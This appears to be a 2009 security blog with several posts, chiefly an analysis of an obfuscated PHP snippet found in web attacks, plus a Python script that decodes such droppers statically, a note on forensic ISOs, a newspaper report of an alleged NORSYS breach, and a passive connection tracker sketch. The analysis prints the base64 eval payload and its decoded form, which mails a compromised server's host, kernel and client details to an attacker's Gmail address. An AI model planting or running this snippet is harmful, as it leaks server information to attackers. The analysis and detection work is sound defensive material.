06.23.09

Obfuscating php code with base64

Posted in Information, OpenSourceSoftware, Security at 1:13 pm by Edward Bjarte Fjellskål

I keep seeing obfuscated php code in web application attacks, but it's rather simple…

$lmge =
"JGNyZWF0b3I9YmFzZTY0X2RlY29kZSgiWm5Jek0zTm9NMnhzUUdkdFlXbHNMbU52YlE9PSIpOw0KKCRzYWZlX21vZ
GUpPygkc2FmZXo9Ik9OIik6KCRzYWZlej0iT0ZGX0hFSEUiKTsNCiRiYXNlPSJodHRwOi8vIi4kX1NFUlZFUlsnSFRUUF9I
T1NUJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107IA0KJG5hbWUgPSBwaHBfdW5hbWUoKTsgJGlwID0gZ2V0ZW52K
CJSRU1PVEVfQUREUiIpOyAkaXAyID0gZ2V0aG9zdGJ5YWRkcigkX1NFUlZFUltSRU1PVEVfQUREUl0pOyAkc3ViaiA9I
CRfU0VSVkVSWydIVFRQX0hPU1QnXTsgDQokbXNnID0gIlxuQkFTRTogJGJhc2VcbnVuYW1lIGE6ICRuYW1lXG5CeXB
hc3M6ICRieXBhc3NlclxuSVA6ICRpcFxuSG9zdDogJGlwMiAkcHdkcyI7DQokZnJvbSA9IkZyb206ICIuJHdyaXQuIl9fXz0iL
iRzYWZlei4iPHRvb2xAIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uIj4iOw0KbWFpbCggJGNyZWF0b3IsICRzdWJqLCAkbXNn
LCAkZnJvbSk7"; eval(base64_decode($lmge));

So, when you base64_decode it (just switch eval with echo), you get:

$creator=base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ==");
($safe_mode)?($safez="ON"):($safez="OFF_HEHE");
$base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST'];
$msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds";
$from ="From: ".$writ."___=".$safez."<tool@".$_SERVER['HTTP_HOST'].">";
mail( $creator, $subj, $msg, $from);

Again, hiding the email address in base64:
$creator=base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ==");
Which spells out fr33sh3ll@gmail.com

There is also an “error” in the script: $bypasser is never set, but it is used in $msg.

Output sent to the fr33sh3ll account looks like this:

From: ___=OFF_HEHE<tool@gamelinux.org>
Subject: gamelinux.org
Data:
BASE: http://gamelinux.org/vurnable.php
uname a: Linux gamelinux 2.6.30 #1 SMP Wed Apr 1 23:47:10 UTC 2009 x86_64
Bypass:
IP: 10.10.3.254
Host: cracker.crackers.ru

From googling, it seems that the email account is old, and Gmail has probably shut it down… so the bot that fires this around is probably old…
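The "switch eval with echo" step above still runs the attacker's PHP interpreter on the sample. As an added example (my own Python, not code from the post), here is the same decoding done statically: it finds the eval(base64_decode(...)) pattern, decodes the outer layer the way PHP's lenient base64_decode() would (line breaks in the blob are skipped), unwraps inner base64 literals such as the hidden e-mail address, flags the mail() call, and lists variables the payload reads but never sets (the $bypasser "error"). The sample PHP at the bottom is constructed to have the same two-layer shape as the blob in the post; the regexes and the ops@example.invalid address are my assumptions.

```python
"""Static triage of eval(base64_decode(...)) PHP droppers.

Added example, not code from the original post: it finds the eval/base64
pattern, decodes the payload WITHOUT executing it, unwraps inner base64
literals (the hidden e-mail address above) and lists variables the payload
reads but never sets ($bypasser in the post). The sample PHP is constructed.
"""
import base64
import binascii
import re
from typing import Optional

# $var = "..."; assignments, value captured across line breaks (the blob in
# the post is wrapped over several lines and PHP does not mind).
ASSIGN_RE = re.compile(r"""(\$\w+)\s*=\s*(["'])(.*?)\2\s*;""", re.S)
# eval(base64_decode($var)) or eval(base64_decode("literal"))
EVAL_RE = re.compile(r"""eval\s*\(\s*base64_decode\s*\(\s*(\$\w+|(["'])(.*?)\2)\s*\)\s*\)""", re.S)
# base64_decode("literal") inside an already-decoded payload
INNER_B64_RE = re.compile(r"""base64_decode\s*\(\s*["']([A-Za-z0-9+/=\s]+)["']\s*\)""")


def php_b64decode(blob: str) -> Optional[str]:
    """Decode like PHP's lenient base64_decode(): characters outside the
    alphabet (newlines, spaces) are skipped, which b64decode(validate=False)
    also does. Returns None instead of raising on garbage."""
    try:
        return base64.b64decode(blob, validate=False).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def unassigned_vars(php: str) -> set:
    """Variables read but never assigned; superglobals ($_SERVER) are skipped."""
    assigned = set(re.findall(r"(\$\w+)\s*=[^=]", php))
    used = set(re.findall(r"\$\w+", php))
    return {v for v in used - assigned if not v.startswith("$_")}


def triage(source: str) -> list:
    """Return one finding per eval(base64_decode(...)) call in a PHP source."""
    assignments = {name: value for name, _q, value in ASSIGN_RE.findall(source)}
    findings = []
    for m in EVAL_RE.finditer(source):
        arg = m.group(1)
        blob = assignments.get(arg) if arg.startswith("$") else m.group(3)
        payload = php_b64decode(blob) if blob is not None else None
        if payload is None:
            continue
        inner = {}
        for lit in INNER_B64_RE.findall(payload):
            decoded = php_b64decode(lit)
            if decoded is not None:
                inner[lit.strip()] = decoded
        findings.append({
            "var": arg,
            "payload": payload,
            "inner": inner,                       # e.g. the hidden mail address
            "calls_mail": re.search(r"\bmail\s*\(", payload) is not None,
            "unassigned": sorted(unassigned_vars(payload)),
        })
    return findings


# Constructed sample with the same shape as the blob in the post: an outer
# base64 layer wrapped over several lines, an inner layer hiding the address.
_INNER_PHP = (
    '$creator=base64_decode("' + base64.b64encode(b"ops@example.invalid").decode() + '");\n'
    '$msg = "uname: " . php_uname() . " bypass: $bypasser";\n'
    'mail($creator, $_SERVER["HTTP_HOST"], $msg);'
)
_blob = base64.b64encode(_INNER_PHP.encode()).decode()
SAMPLE_PHP = (
    '<?php\n$lmge = "' + "\n".join(_blob[i:i + 60] for i in range(0, len(_blob), 60))
    + '"; eval(base64_decode($lmge));\n'
)

if __name__ == "__main__":
    for f in triage(SAMPLE_PHP):
        print(f"{f['var']}: mail={f['calls_mail']} unassigned={f['unassigned']}")
        print("inner literals:", f["inner"])
        print(f["payload"])
```

Running the script against a real sample means passing the file contents to triage(); nothing in the payload is executed, so the inner mail() call and the hidden address show up in the finding without the sample ever reaching a PHP interpreter.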

06.19.09

Binaries for Incident Response/Forensic analysis

Posted in Information, OpenSourceSoftware, Linux Distributions, Security, forensics at 1:03 pm by Edward Bjarte Fjellskål

I did a forensics job in December 08, running into the problem that my statically compiled binaries did not work on my target system. I made the static bins that I needed for the job, but it took some time, so I noted a better way to do it from a SANS blog post. I made a quick and dirty script to prepare my forensic media, and have used it like that since.

A fellow GCFA posted his version of a script yesterday, and I merged it with mine. I plan to make more .iso’s, and you will find them under: http://download.gamelinux.org/InsidentResponse/

The ISOs have the format:
Forensics-dynamic-bins-<Distro>-<Version>-<Arch>.iso

06.17.09

NORSYS, NATO’s secret computer system hacked.

Posted in Information, OpenSourceSoftware, Security at 9:00 am by Edward Bjarte Fjellskål

I’m posting this as I read it as a small note in the paper version of VG on Monday 15 June 2009, and I can’t find any digital reference to it, nor to NORSYS, on the Internet.

Tom Bakkeli is the author of the article in the newspaper version. He has very deep knowledge of the Norwegian military and its secrecy.

Forsvarets sikkerhetstjeneste (FOST) allegedly prevented a catastrophe, as an alleged foreign government hacker had entered NORSYS, NATO’s secret computer system.

Defense minister Anne-Grete Strøm-Erichsen confirms that on one occasion, FOST prevented serious damage to NORSYS. During a NATO exercise three years ago, FOST discovered that someone had successfully entered NORSYS.

Anne-Grete Strøm-Erichsen does not want to comment on when and where, nor who was behind the breach.

Reader’s comment (unconfirmed):
NORSYS is not equal to “NATO’s secret Network”.

06.08.09

CxTracker - A passive network connection tracker…

Posted in Information, OpenSourceSoftware, Security, Sguil, cxtracker at 7:12 pm by Edward Bjarte Fjellskål

I just tested my latest perl project, cxtracker, with sguil.

CxTracker (Connection Tracker) is a passive network connection tracker for profiling, history, auditing and network discovery. It can be used as a replacement for sancp in the sguil setup.

I started implementing this because I am thinking of making prads a bit more connection oriented. Instead of branching prads, I started a small perl script, and I quickly saw that it could do well as a standalone daemon in my sguil environment. So it now has its own life.

I will polish it a bit more, and then start porting the functionality into prads for some performance testing. The idea is that by making prads aware of connections, one can run regexps on parts of the traffic rather than on the whole traffic (to save CPU cycles on TCP/UDP service/client detection).
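To make the two ideas above concrete (sancp-style session records, and regexp-based service detection that only looks at the start of each connection), here is an added Python sketch of a passive connection tracker. It is not cxtracker's own code (cxtracker is Perl) and not prads; it shows the same technique over a constructed packet list: sessions are keyed on the 5-tuple in both directions, counted per direction with start/end times and the union of TCP flags, closed on RST, on FIN from both sides, or on an idle timeout, and the service is guessed by regexp over only the first 64 payload bytes of a session. The packets, the two signatures, the 60-second timeout and the 64-byte inspection window are my assumptions; a real tracker would read packets from libpcap.

```python
"""Passive connection tracking over a constructed packet list.

Added example, not cxtracker's own code (cxtracker is Perl; this Python
sketch shows the same idea): sessions are keyed on the 5-tuple in both
directions, counted per direction with start/end times and TCP flags, closed
on FIN/RST or idle timeout, and the service is guessed by regexp over only
the first bytes of each session. Packets, signatures and the timeout are
constructed assumptions; a real tracker would read them from libpcap.
"""
import re
from collections import namedtuple
from dataclasses import dataclass, field
from typing import List, Optional

# Already-parsed packet; no pcap decoding here. flags = TCP flag letters ("SA", "PA", "FA").
Packet = namedtuple("Packet", "ts proto src sport dst dport size flags payload",
                    defaults=("", b""))


@dataclass
class Connection:
    start: float
    end: float
    proto: str
    src: str            # side that sent the first packet, i.e. the client
    sport: int
    dst: str
    dport: int
    src_pkts: int = 0
    src_bytes: int = 0
    dst_pkts: int = 0
    dst_bytes: int = 0
    flags: set = field(default_factory=set)       # union of TCP flags seen
    fin_dirs: set = field(default_factory=set)    # directions that sent FIN
    first_payload: bytes = b""
    service: Optional[str] = None


# Constructed signatures, matched against the first bytes of a session only.
SERVICE_SIGS = [(re.compile(rb"^(GET|POST|HEAD) /"), "http"),
                (re.compile(rb"^SSH-\d\.\d-"), "ssh")]


def classify(data: bytes) -> Optional[str]:
    return next((name for sig, name in SERVICE_SIGS if sig.search(data)), None)


class ConnectionTracker:
    def __init__(self, idle_timeout=60.0, inspect_bytes=64):
        self.active, self.closed = {}, []
        self.idle_timeout, self.inspect_bytes = idle_timeout, inspect_bytes

    @staticmethod
    def _key(p):
        # Direction-independent key, so both halves of a session meet.
        a, b = (p.src, p.sport), (p.dst, p.dport)
        return (p.proto,) + (a + b if a <= b else b + a)

    def feed(self, p):
        self._expire(p.ts)
        key = self._key(p)
        c = self.active.get(key)
        if c is None:
            c = self.active[key] = Connection(p.ts, p.ts, p.proto, p.src, p.sport, p.dst, p.dport)
        c.end = p.ts
        from_client = (p.src, p.sport) == (c.src, c.sport)
        if from_client:
            c.src_pkts, c.src_bytes = c.src_pkts + 1, c.src_bytes + p.size
        else:
            c.dst_pkts, c.dst_bytes = c.dst_pkts + 1, c.dst_bytes + p.size
        c.flags.update(p.flags)
        # Only the first inspect_bytes of a session are ever regexp-scanned;
        # later packets are counted, not inspected (the CPU saving the post is after).
        if p.payload and len(c.first_payload) < self.inspect_bytes:
            c.first_payload += p.payload[:self.inspect_bytes - len(c.first_payload)]
            c.service = c.service or classify(c.first_payload)
        if p.proto == "tcp":
            if "F" in p.flags:
                c.fin_dirs.add(from_client)
            if "R" in p.flags or len(c.fin_dirs) == 2:
                self._close(key)

    def _close(self, key):
        self.closed.append(self.active.pop(key))

    def _expire(self, now):
        for key in [k for k, c in self.active.items() if now - c.end > self.idle_timeout]:
            self._close(key)

    def flush(self) -> List[Connection]:
        for key in list(self.active):
            self._close(key)
        return self.closed


# Constructed traffic: one HTTP session, one mDNS datagram that idles out, one SSH banner.
SAMPLE_PACKETS = [
    Packet(0.00, "tcp", "10.0.0.5", 40000, "192.0.2.10", 80, 60, "S"),
    Packet(0.01, "tcp", "192.0.2.10", 80, "10.0.0.5", 40000, 60, "SA"),
    Packet(0.02, "tcp", "10.0.0.5", 40000, "192.0.2.10", 80, 52, "A"),
    Packet(0.03, "tcp", "10.0.0.5", 40000, "192.0.2.10", 80, 200, "PA",
           b"GET /index.html HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n"),
    Packet(0.05, "tcp", "192.0.2.10", 80, "10.0.0.5", 40000, 1500, "PA", b"HTTP/1.1 200 OK\r\n"),
    Packet(0.06, "tcp", "10.0.0.5", 40000, "192.0.2.10", 80, 52, "FA"),
    Packet(0.07, "tcp", "192.0.2.10", 80, "10.0.0.5", 40000, 52, "FA"),
    Packet(5.00, "udp", "10.0.0.5", 5353, "224.0.0.251", 5353, 120, "", b"\x00\x00\x84\x00"),
    Packet(100.0, "tcp", "10.0.0.7", 40001, "192.0.2.20", 22, 60, "S"),
    Packet(100.1, "tcp", "192.0.2.20", 22, "10.0.0.7", 40001, 80, "PA", b"SSH-2.0-OpenSSH_7.4\r\n"),
]


def track(packets) -> List[Connection]:
    t = ConnectionTracker()
    for p in packets:
        t.feed(p)
    return t.flush()


if __name__ == "__main__":
    for c in track(SAMPLE_PACKETS):
        print(f"{c.proto} {c.src}:{c.sport} -> {c.dst}:{c.dport} {c.start:.2f}-{c.end:.2f} "
              f"{c.src_pkts}/{c.src_bytes} {c.dst_pkts}/{c.dst_bytes} "
              f"flags={''.join(sorted(c.flags))} service={c.service}")
```

The record each closed Connection carries (endpoints, start/end, per-direction packet and byte counts, flags, service) is the kind of session summary sancp feeds into sguil; the inspect_bytes cap is what keeps the regexp cost bounded per session instead of per packet.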

Check it out / clone it! Feedback is always welcome!

“Know your connections!”